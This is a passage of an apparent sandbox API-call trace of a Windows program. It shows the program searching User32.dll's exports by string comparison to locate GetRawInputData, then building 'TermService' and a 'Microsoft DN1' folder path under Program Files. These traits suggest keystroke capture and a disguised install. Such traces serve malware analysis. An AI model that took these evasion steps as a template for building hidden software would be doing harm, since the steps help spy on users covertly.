(lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x198 [0185.324] LoadLibraryW (lpLibFileName="User32.dll") returned 0x75b00000 [0185.359] lstrcmpA (lpString1="ActivateKeyboardLayout", lpString2="GetRawInputData") returned -1 [0185.359] lstrcmpA (lpString1="AddClipboardFormatListener", lpString2="GetRawInputData") returned -1 [0185.359] lstrcmpA (lpString1="AdjustWindowRect", lpString2="GetRawInputData") returned -1 [0185.359] lstrcmpA (lpString1="AdjustWindowRectEx", lpString2="GetRawInputData") returned -1 [0185.359] lstrcmpA (lpString1="AlignRects", lpString2="GetRawInputData") returned -1 [0185.359] lstrcmpA (lpString1="AllowForegroundActivation", lpString2="GetRawInputData") returned -1 [0185.359] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="GetRawInputData") returned -1 [0185.359] lstrcmpA (lpString1="AnimateWindow", lpString2="GetRawInputData") returned -1 [0185.359] lstrcmpA (lpString1="AnyPopup", lpString2="GetRawInputData") returned -1 [0185.359] lstrcmpA (lpString1="AppendMenuA", lpString2="GetRawInputData") returned -1 [0185.359] lstrcmpA (lpString1="AppendMenuW", lpString2="GetRawInputData") returned -1 [0185.359] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="GetRawInputData") returned -1 [0185.359] lstrcmpA (lpString1="AttachThreadInput", lpString2="GetRawInputData") returned -1 [0185.359] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="GetRawInputData") returned -1 [0185.359] lstrcmpA (lpString1="BeginPaint", lpString2="GetRawInputData") returned -1 [0185.359] lstrcmpA (lpString1="BlockInput", lpString2="GetRawInputData") returned -1 [0185.359] lstrcmpA (lpString1="BringWindowToTop", lpString2="GetRawInputData") returned -1 [0185.359] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="GetRawInputData") returned -1 [0185.359] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="GetRawInputData") returned -1 [0185.359] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="GetRawInputData") returned -1 [0185.359] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="GetRawInputData") returned -1 [0185.359] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="GetRawInputData") returned -1 [0185.360] lstrcmpA (lpString1="BuildReasonArray", lpString2="GetRawInputData") returned -1 [0185.360] lstrcmpA (lpString1="CalcMenuBar", lpString2="GetRawInputData") returned -1 [0185.360] lstrcmpA (lpString1="CalculatePopupWindowPosition", lpString2="GetRawInputData") returned -1 [0185.360] lstrcmpA (lpString1="CallMsgFilter", lpString2="GetRawInputData") returned -1 [0185.360] lstrcmpA (lpString1="CallMsgFilterA", lpString2="GetRawInputData") returned -1 [0185.360] lstrcmpA (lpString1="CallMsgFilterW", lpString2="GetRawInputData") returned -1 [0185.360] lstrcmpA (lpString1="CallNextHookEx", lpString2="GetRawInputData") returned -1 [0185.360] lstrcmpA (lpString1="CallWindowProcA", lpString2="GetRawInputData") returned -1 [0185.360] lstrcmpA (lpString1="CallWindowProcW", lpString2="GetRawInputData") returned -1 [0185.360] lstrcmpA (lpString1="CancelShutdown", lpString2="GetRawInputData") returned -1 [0185.360] lstrcmpA (lpString1="CascadeChildWindows", lpString2="GetRawInputData") returned -1 [0185.360] lstrcmpA (lpString1="CascadeWindows", lpString2="GetRawInputData") returned -1 [0185.360] lstrcmpA (lpString1="ChangeClipboardChain", lpString2="GetRawInputData") returned -1 [0185.360] lstrcmpA (lpString1="ChangeDisplaySettingsA", lpString2="GetRawInputData") returned -1 [0185.360] lstrcmpA (lpString1="ChangeDisplaySettingsExA", lpString2="GetRawInputData") returned -1 [0185.360] lstrcmpA (lpString1="ChangeDisplaySettingsExW", lpString2="GetRawInputData") returned -1 [0185.360] lstrcmpA (lpString1="ChangeDisplaySettingsW", lpString2="GetRawInputData") returned -1 [0185.360] lstrcmpA (lpString1="ChangeMenuA", lpString2="GetRawInputData") returned -1 [0185.360] lstrcmpA (lpString1="ChangeMenuW", lpString2="GetRawInputData") returned -1 [0185.360] lstrcmpA (lpString1="ChangeWindowMessageFilter", lpString2="GetRawInputData") returned -1 [0185.360] lstrcmpA (lpString1="ChangeWindowMessageFilterEx", lpString2="GetRawInputData") returned -1 [0185.360] lstrcmpA (lpString1="CharLowerA", lpString2="GetRawInputData") returned -1 [0185.360] lstrcmpA (lpString1="CharLowerBuffA", lpString2="GetRawInputData") returned -1 [0185.360] lstrcmpA (lpString1="CharLowerBuffW", lpString2="GetRawInputData") returned -1 [0185.361] lstrcmpA (lpString1="CharLowerW", lpString2="GetRawInputData") returned -1 [0185.361] lstrcmpA (lpString1="CharNextA", lpString2="GetRawInputData") returned -1 [0185.361] lstrcmpA (lpString1="CharNextExA", lpString2="GetRawInputData") returned -1 [0185.361] lstrcmpA (lpString1="CharNextW", lpString2="GetRawInputData") returned -1 [0185.361] lstrcmpA (lpString1="CharPrevA", lpString2="GetRawInputData") returned -1 [0185.361] lstrcmpA (lpString1="CharPrevExA", lpString2="GetRawInputData") returned -1 [0185.361] lstrcmpA (lpString1="CharPrevW", lpString2="GetRawInputData") returned -1 [0185.361] lstrcmpA (lpString1="CharToOemA", lpString2="GetRawInputData") returned -1 [0185.361] lstrcmpA (lpString1="CharToOemBuffA", lpString2="GetRawInputData") returned -1 [0185.361] lstrcmpA (lpString1="CharToOemBuffW", lpString2="GetRawInputData") returned -1 [0185.361] lstrcmpA (lpString1="CharToOemW", lpString2="GetRawInputData") returned -1 [0185.361] lstrcmpA (lpString1="CharUpperA", lpString2="GetRawInputData") returned -1 [0185.361] lstrcmpA (lpString1="CharUpperBuffA", lpString2="GetRawInputData") returned -1 [0185.361] lstrcmpA (lpString1="CharUpperBuffW", lpString2="GetRawInputData") returned -1 [0185.361] lstrcmpA (lpString1="CharUpperW", lpString2="GetRawInputData") returned -1 [0185.361] lstrcmpA (lpString1="CheckDesktopByThreadId", lpString2="GetRawInputData") returned -1 [0185.361] lstrcmpA (lpString1="CheckDlgButton", lpString2="GetRawInputData") returned -1 [0185.361] lstrcmpA (lpString1="CheckMenuItem", lpString2="GetRawInputData") returned -1 [0185.361] lstrcmpA (lpString1="CheckMenuRadioItem", lpString2="GetRawInputData") returned -1 [0185.361] lstrcmpA (lpString1="CheckRadioButton", lpString2="GetRawInputData") returned -1 [0185.361] lstrcmpA (lpString1="CheckWindowThreadDesktop", lpString2="GetRawInputData") returned -1 [0185.361] lstrcmpA (lpString1="ChildWindowFromPoint", lpString2="GetRawInputData") returned -1 [0185.361] lstrcmpA (lpString1="ChildWindowFromPointEx", lpString2="GetRawInputData") returned -1 [0185.361] lstrcmpA (lpString1="CliImmSetHotKey", lpString2="GetRawInputData") returned -1 [0185.361] lstrcmpA (lpString1="ClientThreadSetup", lpString2="GetRawInputData") returned -1 [0185.361] lstrcmpA (lpString1="ClientToScreen", lpString2="GetRawInputData") returned -1 [0185.361] lstrcmpA (lpString1="ClipCursor", lpString2="GetRawInputData") returned -1 [0185.361] lstrcmpA (lpString1="CloseClipboard", lpString2="GetRawInputData") returned -1 [0185.361] lstrcmpA (lpString1="CloseDesktop", lpString2="GetRawInputData") returned -1 [0185.361] lstrcmpA (lpString1="CloseGestureInfoHandle", lpString2="GetRawInputData") returned -1 [0185.361] lstrcmpA (lpString1="CloseTouchInputHandle", lpString2="GetRawInputData") returned -1 [0185.361] lstrcmpA (lpString1="CloseWindow", lpString2="GetRawInputData") returned -1 [0185.362] lstrcmpA (lpString1="CloseWindowStation", lpString2="GetRawInputData") returned -1 [0185.362] lstrcmpA (lpString1="ConsoleControl", lpString2="GetRawInputData") returned -1 [0185.362] lstrcmpA (lpString1="ControlMagnification", lpString2="GetRawInputData") returned -1 [0185.362] lstrcmpA (lpString1="CopyAcceleratorTableA", lpString2="GetRawInputData") returned -1 [0185.362] lstrcmpA (lpString1="CopyAcceleratorTableW", lpString2="GetRawInputData") returned -1 [0185.362] lstrcmpA (lpString1="CopyIcon", lpString2="GetRawInputData") returned -1 [0185.362] lstrcmpA (lpString1="CopyImage", lpString2="GetRawInputData") returned -1 [0185.362] lstrcmpA (lpString1="CopyRect", lpString2="GetRawInputData") returned -1 [0185.362] lstrcmpA (lpString1="CountClipboardFormats", lpString2="GetRawInputData") returned -1 [0185.362] lstrcmpA (lpString1="CreateAcceleratorTableA", lpString2="GetRawInputData") returned -1 [0185.362] lstrcmpA (lpString1="CreateAcceleratorTableW", lpString2="GetRawInputData") returned -1 [0185.362] lstrcmpA (lpString1="CreateCaret", lpString2="GetRawInputData") returned -1 [0185.362] lstrcmpA (lpString1="CreateCursor", lpString2="GetRawInputData") returned -1 [0185.362] lstrcmpA (lpString1="CreateDesktopA", lpString2="GetRawInputData") returned -1 [0185.362] lstrcmpA (lpString1="CreateDesktopExA", lpString2="GetRawInputData") returned -1 [0185.362] lstrcmpA (lpString1="CreateDesktopExW", lpString2="GetRawInputData") returned -1 [0185.362] lstrcmpA (lpString1="CreateDesktopW", lpString2="GetRawInputData") returned -1 [0185.362] lstrcmpA (lpString1="CreateDialogIndirectParamA", lpString2="GetRawInputData") returned -1 [0185.362] lstrcmpA (lpString1="CreateDialogIndirectParamAorW", lpString2="GetRawInputData") returned -1 [0185.362] lstrcmpA (lpString1="CreateDialogIndirectParamW", lpString2="GetRawInputData") returned -1 [0185.362] lstrcmpA (lpString1="CreateDialogParamA", lpString2="GetRawInputData") returned -1 [0185.362] lstrcmpA (lpString1="CreateDialogParamW", lpString2="GetRawInputData") returned -1 [0185.362] lstrcmpA (lpString1="CreateIcon", lpString2="GetRawInputData") returned -1 [0185.362] lstrcmpA (lpString1="CreateIconFromResource", lpString2="GetRawInputData") returned -1 [0185.362] lstrcmpA (lpString1="CreateIconFromResourceEx", lpString2="GetRawInputData") returned -1 [0185.362] lstrcmpA (lpString1="CreateIconIndirect", lpString2="GetRawInputData") returned -1 [0185.362] lstrcmpA (lpString1="CreateMDIWindowA", lpString2="GetRawInputData") returned -1 [0185.362] lstrcmpA (lpString1="CreateMDIWindowW", lpString2="GetRawInputData") returned -1 [0185.362] lstrcmpA (lpString1="CreateMenu", lpString2="GetRawInputData") returned -1 [0185.362] lstrcmpA (lpString1="CreatePopupMenu", lpString2="GetRawInputData") returned -1 [0185.362] lstrcmpA (lpString1="CreateSystemThreads", lpString2="GetRawInputData") returned -1 [0185.363] lstrcmpA (lpString1="CreateWindowExA", lpString2="GetRawInputData") returned -1 [0185.363] lstrcmpA (lpString1="CreateWindowExW", lpString2="GetRawInputData") returned -1 [0185.363] lstrcmpA (lpString1="CreateWindowStationA", lpString2="GetRawInputData") returned -1 [0185.363] lstrcmpA (lpString1="CreateWindowStationW", lpString2="GetRawInputData") returned -1 [0185.363] lstrcmpA (lpString1="CsrBroadcastSystemMessageExW", lpString2="GetRawInputData") returned -1 [0185.363] lstrcmpA (lpString1="CtxInitUser32", lpString2="GetRawInputData") returned -1 [0185.363] lstrcmpA (lpString1="DdeAbandonTransaction", lpString2="GetRawInputData") returned -1 [0185.363] lstrcmpA (lpString1="DdeAccessData", lpString2="GetRawInputData") returned -1 [0185.363] lstrcmpA (lpString1="DdeAddData", lpString2="GetRawInputData") returned -1 [0185.363] lstrcmpA (lpString1="DdeClientTransaction", lpString2="GetRawInputData") returned -1 [0185.363] lstrcmpA (lpString1="DdeCmpStringHandles", lpString2="GetRawInputData") returned -1 [0185.363] lstrcmpA (lpString1="DdeConnect", lpString2="GetRawInputData") returned -1 [0185.363] lstrcmpA (lpString1="DdeConnectList", lpString2="GetRawInputData") returned -1 [0185.363] lstrcmpA (lpString1="DdeCreateDataHandle", lpString2="GetRawInputData") returned -1 [0185.363] lstrcmpA (lpString1="DdeCreateStringHandleA", lpString2="GetRawInputData") returned -1 [0185.363] lstrcmpA (lpString1="DdeCreateStringHandleW", lpString2="GetRawInputData") returned -1 [0185.363] lstrcmpA (lpString1="DdeDisconnect", lpString2="GetRawInputData") returned -1 [0185.363] lstrcmpA (lpString1="DdeDisconnectList", lpString2="GetRawInputData") returned -1 [0185.363] lstrcmpA (lpString1="DdeEnableCallback", lpString2="GetRawInputData") returned -1 [0185.363] lstrcmpA (lpString1="DdeFreeDataHandle", lpString2="GetRawInputData") returned -1 [0185.363] lstrcmpA (lpString1="DdeFreeStringHandle", lpString2="GetRawInputData") returned -1 [0185.363] lstrcmpA (lpString1="DdeGetData", lpString2="GetRawInputData") returned -1 [0185.364] lstrcmpA (lpString1="DdeGetLastError", lpString2="GetRawInputData") returned -1 [0185.364] lstrcmpA (lpString1="DdeGetQualityOfService", lpString2="GetRawInputData") returned -1 [0185.364] lstrcmpA (lpString1="DdeImpersonateClient", lpString2="GetRawInputData") returned -1 [0185.364] lstrcmpA (lpString1="DdeInitializeA", lpString2="GetRawInputData") returned -1 [0185.364] lstrcmpA (lpString1="DdeInitializeW", lpString2="GetRawInputData") returned -1 [0185.364] lstrcmpA (lpString1="DdeKeepStringHandle", lpString2="GetRawInputData") returned -1 [0185.364] lstrcmpA (lpString1="DdeNameService", lpString2="GetRawInputData") returned -1 [0185.364] lstrcmpA (lpString1="DdePostAdvise", lpString2="GetRawInputData") returned -1 [0185.364] lstrcmpA (lpString1="DdeQueryConvInfo", lpString2="GetRawInputData") returned -1 [0185.364] lstrcmpA (lpString1="DdeQueryNextServer", lpString2="GetRawInputData") returned -1 [0185.364] lstrcmpA (lpString1="DdeQueryStringA", lpString2="GetRawInputData") returned -1 [0185.364] lstrcmpA (lpString1="DdeQueryStringW", lpString2="GetRawInputData") returned -1 [0185.364] lstrcmpA (lpString1="DdeReconnect", lpString2="GetRawInputData") returned -1 [0185.364] lstrcmpA (lpString1="DdeSetQualityOfService", lpString2="GetRawInputData") returned -1 [0185.364] lstrcmpA (lpString1="DdeSetUserHandle", lpString2="GetRawInputData") returned -1 [0185.364] lstrcmpA (lpString1="DdeUnaccessData", lpString2="GetRawInputData") returned -1 [0185.364] lstrcmpA (lpString1="DdeUninitialize", lpString2="GetRawInputData") returned -1 [0185.364] lstrcmpA (lpString1="DefDlgProcA", lpString2="GetRawInputData") returned -1 [0185.364] lstrcmpA (lpString1="DefDlgProcW", lpString2="GetRawInputData") returned -1 [0185.364] lstrcmpA (lpString1="DefFrameProcA", lpString2="GetRawInputData") returned -1 [0185.364] lstrcmpA (lpString1="DefFrameProcW", lpString2="GetRawInputData") returned -1 [0185.364] lstrcmpA (lpString1="DefMDIChildProcA", lpString2="GetRawInputData") returned -1 [0185.364] lstrcmpA (lpString1="DefMDIChildProcW", lpString2="GetRawInputData") returned -1 [0185.364] lstrcmpA (lpString1="DefRawInputProc", lpString2="GetRawInputData") returned -1 [0185.364] lstrcmpA (lpString1="DefWindowProcA", lpString2="GetRawInputData") returned -1 [0185.364] lstrcmpA (lpString1="DefWindowProcW", lpString2="GetRawInputData") returned -1 [0185.364] lstrcmpA (lpString1="DeferWindowPos", lpString2="GetRawInputData") returned -1 [0185.364] lstrcmpA (lpString1="DeleteMenu", lpString2="GetRawInputData") returned -1 [0185.365] lstrcmpA (lpString1="DeregisterShellHookWindow", lpString2="GetRawInputData") returned -1 [0185.365] lstrcmpA (lpString1="DestroyAcceleratorTable", lpString2="GetRawInputData") returned -1 [0185.365] lstrcmpA (lpString1="DestroyCaret", lpString2="GetRawInputData") returned -1 [0185.365] lstrcmpA (lpString1="DestroyCursor", lpString2="GetRawInputData") returned -1 [0185.365] lstrcmpA (lpString1="DestroyIcon", lpString2="GetRawInputData") returned -1 [0185.365] lstrcmpA (lpString1="DestroyMenu", lpString2="GetRawInputData") returned -1 [0185.365] lstrcmpA (lpString1="DestroyReasons", lpString2="GetRawInputData") returned -1 [0185.365] lstrcmpA (lpString1="DestroyWindow", lpString2="GetRawInputData") returned -1 [0185.365] lstrcmpA (lpString1="DeviceEventWorker", lpString2="GetRawInputData") returned -1 [0185.365] lstrcmpA (lpString1="DialogBoxIndirectParamA", lpString2="GetRawInputData") returned -1 [0185.365] lstrcmpA (lpString1="DialogBoxIndirectParamAorW", lpString2="GetRawInputData") returned -1 [0185.365] lstrcmpA (lpString1="DialogBoxIndirectParamW", lpString2="GetRawInputData") returned -1 [0185.365] lstrcmpA (lpString1="DialogBoxParamA", lpString2="GetRawInputData") returned -1 [0185.365] lstrcmpA (lpString1="DialogBoxParamW", lpString2="GetRawInputData") returned -1 [0185.365] lstrcmpA (lpString1="DisableProcessWindowsGhosting", lpString2="GetRawInputData") returned -1 [0185.365] lstrcmpA (lpString1="DispatchMessageA", lpString2="GetRawInputData") returned -1 [0185.365] lstrcmpA (lpString1="DispatchMessageW", lpString2="GetRawInputData") returned -1 [0185.365] lstrcmpA (lpString1="DisplayConfigGetDeviceInfo", lpString2="GetRawInputData") returned -1 [0185.365] lstrcmpA (lpString1="DisplayConfigSetDeviceInfo", lpString2="GetRawInputData") returned -1 [0185.365] lstrcmpA (lpString1="DisplayExitWindowsWarnings", lpString2="GetRawInputData") returned -1 [0185.365] lstrcmpA (lpString1="DlgDirListA", lpString2="GetRawInputData") returned -1 [0185.365] lstrcmpA (lpString1="DlgDirListComboBoxA", lpString2="GetRawInputData") returned -1 [0185.365] lstrcmpA (lpString1="DlgDirListComboBoxW", lpString2="GetRawInputData") returned -1 [0185.365] lstrcmpA (lpString1="DlgDirListW", lpString2="GetRawInputData") returned -1 [0185.365] lstrcmpA (lpString1="DlgDirSelectComboBoxExA", lpString2="GetRawInputData") returned -1 [0185.365] lstrcmpA (lpString1="DlgDirSelectComboBoxExW", lpString2="GetRawInputData") returned -1 [0185.365] lstrcmpA (lpString1="DlgDirSelectExA", lpString2="GetRawInputData") returned -1 [0185.366] lstrcmpA (lpString1="DlgDirSelectExW", lpString2="GetRawInputData") returned -1 [0185.366] lstrcmpA (lpString1="DoSoundConnect", lpString2="GetRawInputData") returned -1 [0185.366] lstrcmpA (lpString1="DoSoundDisconnect", lpString2="GetRawInputData") returned -1 [0185.366] lstrcmpA (lpString1="DragDetect", lpString2="GetRawInputData") returned -1 [0185.366] lstrcmpA (lpString1="DragObject", lpString2="GetRawInputData") returned -1 [0185.366] lstrcmpA (lpString1="DrawAnimatedRects", lpString2="GetRawInputData") returned -1 [0185.366] lstrcmpA (lpString1="DrawCaption", lpString2="GetRawInputData") returned -1 [0185.366] lstrcmpA (lpString1="DrawCaptionTempA", lpString2="GetRawInputData") returned -1 [0185.366] lstrcmpA (lpString1="DrawCaptionTempW", lpString2="GetRawInputData") returned -1 [0185.366] lstrcmpA (lpString1="DrawEdge", lpString2="GetRawInputData") returned -1 [0185.366] lstrcmpA (lpString1="DrawFocusRect", lpString2="GetRawInputData") returned -1 [0185.366] lstrcmpA (lpString1="DrawFrame", lpString2="GetRawInputData") returned -1 [0185.366] lstrcmpA (lpString1="DrawFrameControl", lpString2="GetRawInputData") returned -1 [0185.366] lstrcmpA (lpString1="DrawIcon", lpString2="GetRawInputData") returned -1 [0185.366] lstrcmpA (lpString1="DrawIconEx", lpString2="GetRawInputData") returned -1 [0185.366] lstrcmpA (lpString1="DrawMenuBar", lpString2="GetRawInputData") returned -1 [0185.366] lstrcmpA (lpString1="DrawMenuBarTemp", lpString2="GetRawInputData") returned -1 [0185.366] lstrcmpA (lpString1="DrawStateA", lpString2="GetRawInputData") returned -1 [0185.366] lstrcmpA (lpString1="DrawStateW", lpString2="GetRawInputData") returned -1 [0185.366] lstrcmpA (lpString1="DrawTextA", lpString2="GetRawInputData") returned -1 [0185.366] lstrcmpA (lpString1="DrawTextExA", lpString2="GetRawInputData") returned -1 [0185.366] lstrcmpA (lpString1="DrawTextExW", lpString2="GetRawInputData") returned -1 [0185.366] lstrcmpA (lpString1="DrawTextW", lpString2="GetRawInputData") returned -1 [0185.366] lstrcmpA (lpString1="DwmGetDxSharedSurface", lpString2="GetRawInputData") returned -1 [0185.366] lstrcmpA (lpString1="DwmStartRedirection", lpString2="GetRawInputData") returned -1 [0185.366] lstrcmpA (lpString1="DwmStopRedirection", lpString2="GetRawInputData") returned -1 [0185.366] lstrcmpA (lpString1="EditWndProc", lpString2="GetRawInputData") returned -1 [0185.366] lstrcmpA (lpString1="EmptyClipboard", lpString2="GetRawInputData") returned -1 [0185.366] lstrcmpA (lpString1="EnableMenuItem", lpString2="GetRawInputData") returned -1 [0185.367] lstrcmpA (lpString1="EnableScrollBar", lpString2="GetRawInputData") returned -1 [0185.367] lstrcmpA (lpString1="EnableWindow", lpString2="GetRawInputData") returned -1 [0185.367] lstrcmpA (lpString1="EndDeferWindowPos", lpString2="GetRawInputData") returned -1 [0185.367] lstrcmpA (lpString1="EndDialog", lpString2="GetRawInputData") returned -1 [0185.367] lstrcmpA (lpString1="EndMenu", lpString2="GetRawInputData") returned -1 [0185.367] lstrcmpA (lpString1="EndPaint", lpString2="GetRawInputData") returned -1 [0185.367] lstrcmpA (lpString1="EndTask", lpString2="GetRawInputData") returned -1 [0185.367] lstrcmpA (lpString1="EnterReaderModeHelper", lpString2="GetRawInputData") returned -1 [0185.367] lstrcmpA (lpString1="EnumChildWindows", lpString2="GetRawInputData") returned -1 [0185.367] lstrcmpA (lpString1="EnumClipboardFormats", lpString2="GetRawInputData") returned -1 [0185.367] lstrcmpA (lpString1="EnumDesktopWindows", lpString2="GetRawInputData") returned -1 [0185.367] lstrcmpA (lpString1="EnumDesktopsA", lpString2="GetRawInputData") returned -1 [0185.367] lstrcmpA (lpString1="EnumDesktopsW", lpString2="GetRawInputData") returned -1 [0185.367] lstrcmpA (lpString1="EnumDisplayDevicesA", lpString2="GetRawInputData") returned -1 [0185.367] lstrcmpA (lpString1="EnumDisplayDevicesW", lpString2="GetRawInputData") returned -1 [0185.367] lstrcmpA (lpString1="EnumDisplayMonitors", lpString2="GetRawInputData") returned -1 [0185.367] lstrcmpA (lpString1="EnumDisplaySettingsA", lpString2="GetRawInputData") returned -1 [0185.367] lstrcmpA (lpString1="EnumDisplaySettingsExA", lpString2="GetRawInputData") returned -1 [0185.367] lstrcmpA (lpString1="EnumDisplaySettingsExW", lpString2="GetRawInputData") returned -1 [0185.367] lstrcmpA (lpString1="EnumDisplaySettingsW", lpString2="GetRawInputData") returned -1 [0185.367] lstrcmpA (lpString1="EnumPropsA", lpString2="GetRawInputData") returned -1 [0185.367] lstrcmpA (lpString1="EnumPropsExA", lpString2="GetRawInputData") returned -1 [0185.367] lstrcmpA (lpString1="EnumPropsExW", lpString2="GetRawInputData") returned -1 [0185.367] lstrcmpA (lpString1="EnumPropsW", lpString2="GetRawInputData") returned -1 [0185.367] lstrcmpA (lpString1="EnumThreadWindows", lpString2="GetRawInputData") returned -1 [0185.367] lstrcmpA (lpString1="EnumWindowStationsA", lpString2="GetRawInputData") returned -1 [0185.367] lstrcmpA (lpString1="EnumWindowStationsW", lpString2="GetRawInputData") returned -1 [0185.368] lstrcmpA (lpString1="EnumWindows", lpString2="GetRawInputData") returned -1 [0185.368] lstrcmpA (lpString1="EqualRect", lpString2="GetRawInputData") returned -1 [0185.368] lstrcmpA (lpString1="ExcludeUpdateRgn", lpString2="GetRawInputData") returned -1 [0185.368] lstrcmpA (lpString1="ExitWindowsEx", lpString2="GetRawInputData") returned -1 [0185.368] lstrcmpA (lpString1="FillRect", lpString2="GetRawInputData") returned -1 [0185.368] lstrcmpA (lpString1="FindWindowA", lpString2="GetRawInputData") returned -1 [0185.368] lstrcmpA (lpString1="FindWindowExA", lpString2="GetRawInputData") returned -1 [0185.368] GetProcessHeap () returned 0x900000 [0185.369] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0x18) returned 0x927208 [0185.369] lstrlenW (lpString="TermService") returned 11 [0185.369] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xae0000 [0185.369] lstrlenW (lpString="TermService") returned 11 [0185.369] lstrcpyW (in: lpString1=0xae0000, lpString2="TermService" | out: lpString1="TermService") returned="TermService" [0185.369] lstrlenW (lpString="TermService") returned 11 [0185.369] VirtualAlloc (lpAddress=0x0, dwSize=0x1a, flAllocationType=0x3000, flProtect=0x4) returned 0xaf0000 [0185.369] lstrcatW (in: lpString1="", lpString2="TermService" | out: lpString1="TermService") returned="TermService" [0185.370] VirtualFree (lpAddress=0xae0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.370] lstrlenW (lpString="%ProgramFiles%") returned 14 [0185.370] VirtualAlloc (lpAddress=0x0, dwSize=0x1e, flAllocationType=0x3000, flProtect=0x4) returned 0xae0000 [0185.370] lstrlenW (lpString="%ProgramFiles%") returned 14 [0185.370] lstrcpyW (in: lpString1=0xae0000, lpString2="%ProgramFiles%" | out: lpString1="%ProgramFiles%") returned="%ProgramFiles%" [0185.370] lstrlenW (lpString="%ProgramFiles%") returned 14 [0185.370] VirtualAlloc (lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x4) returned 0xb40000 [0185.370] lstrcatW (in: lpString1="", lpString2="%ProgramFiles%" | out: lpString1="%ProgramFiles%") returned="%ProgramFiles%" [0185.370] VirtualFree (lpAddress=0xae0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.370] GetCurrentProcess () returned 0xffffffff [0185.371] GetModuleHandleA (lpModuleName="kernel32") returned 0x76210000 [0185.371] GetProcAddress (hModule=0x76210000, lpProcName="IsWow64Process") returned 0x7622195e [0185.371] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x34fb84 | out: Wow64Process=0x34fb84) returned 1 [0185.371] VirtualFree (lpAddress=0xb40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.371] lstrlenW (lpString="%ProgramW6432%") returned 14 [0185.371] VirtualAlloc (lpAddress=0x0, dwSize=0x1e, flAllocationType=0x3000, flProtect=0x4) returned 0xae0000 [0185.371] lstrlenW (lpString="%ProgramW6432%") returned 14 [0185.371] lstrcpyW (in: lpString1=0xae0000, lpString2="%ProgramW6432%" | out: lpString1="%ProgramW6432%") returned="%ProgramW6432%" [0185.371] lstrlenW (lpString="%ProgramW6432%") returned 14 [0185.371] VirtualAlloc (lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x4) returned 0xb40000 [0185.371] lstrcatW (in: lpString1="", lpString2="%ProgramW6432%" | out: lpString1="%ProgramW6432%") returned="%ProgramW6432%" [0185.371] VirtualFree (lpAddress=0xae0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.372] ExpandEnvironmentStringsW (in: lpSrc="%ProgramW6432%", lpDst=0x34f794, nSize=0x1ff | out: lpDst="C:\\Program Files") returned 0x11 [0185.372] lstrlenW (lpString="C:\\Program Files") returned 16 [0185.372] VirtualAlloc (lpAddress=0x0, dwSize=0x22, flAllocationType=0x3000, flProtect=0x4) returned 0xae0000 [0185.372] lstrlenW (lpString="C:\\Program Files") returned 16 [0185.372] lstrcpyW (in: lpString1=0xae0000, lpString2="C:\\Program Files" | out: lpString1="C:\\Program Files") returned="C:\\Program Files" [0185.372] lstrlenW (lpString="C:\\Program Files") returned 16 [0185.372] VirtualAlloc (lpAddress=0x0, dwSize=0x22, flAllocationType=0x3000, flProtect=0x4) returned 0xb50000 [0185.372] lstrcpyW (in: lpString1=0xb50000, lpString2="C:\\Program Files" | out: lpString1="C:\\Program Files") returned="C:\\Program Files" [0185.372] VirtualFree (lpAddress=0xae0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.372] VirtualFree (lpAddress=0xb40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.372] lstrlenW (lpString="%ProgramFiles%") returned 14 [0185.372] VirtualAlloc (lpAddress=0x0, dwSize=0x1e, flAllocationType=0x3000, flProtect=0x4) returned 0xae0000 [0185.373] lstrlenW (lpString="%ProgramFiles%") returned 14 [0185.373] lstrcpyW (in: lpString1=0xae0000, lpString2="%ProgramFiles%" | out: lpString1="%ProgramFiles%") returned="%ProgramFiles%" [0185.373] lstrlenW (lpString="%ProgramFiles%") returned 14 [0185.373] VirtualAlloc (lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x4) returned 0xb40000 [0185.373] lstrcatW (in: lpString1="", lpString2="%ProgramFiles%" | out: lpString1="%ProgramFiles%") returned="%ProgramFiles%" [0185.373] VirtualFree (lpAddress=0xae0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.373] lstrlenW (lpString="\\Microsoft DN1") returned 14 [0185.373] VirtualAlloc (lpAddress=0x0, dwSize=0x1e, flAllocationType=0x3000, flProtect=0x4) returned 0xae0000 [0185.373] lstrlenW (lpString="\\Microsoft DN1") returned 14 [0185.373] lstrcpyW (in: lpString1=0xae0000, lpString2="\\Microsoft DN1" | out: lpString1="\\Microsoft DN1") returned="\\Microsoft DN1" [0185.373] lstrlenW (lpString="\\Microsoft DN1") returned 14 [0185.373] lstrlenW (lpString="C:\\Program Files") returned 16 [0185.373] VirtualQuery (in: lpAddress=0xb50000, lpBuffer=0x34fb38, dwLength=0x1c | out: lpBuffer=0x34fb38*(BaseAddress=0xb50000, AllocationBase=0xb50000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0185.374] VirtualAlloc (lpAddress=0x0, dwSize=0x40, flAllocationType=0x3000, flProtect=0x4) returned 0xb60000 [0185.374] VirtualFree (lpAddress=0xb50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.374] lstrcatW (in: lpString1="C:\\Program Files", lpString2="\\Microsoft DN1" | out: lpString1="C:\\Program Files\\Microsoft DN1") returned="C:\\Program Files\\Microsoft DN1" [0185.374] VirtualFree (lpAddress=0xae0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.374] lstrlenW (lpString="\\Microsoft DN1") returned 14 [0185.374] VirtualAlloc (lpAddress=0x0, dwSize=0x1e, flAllocationType=0x3000, 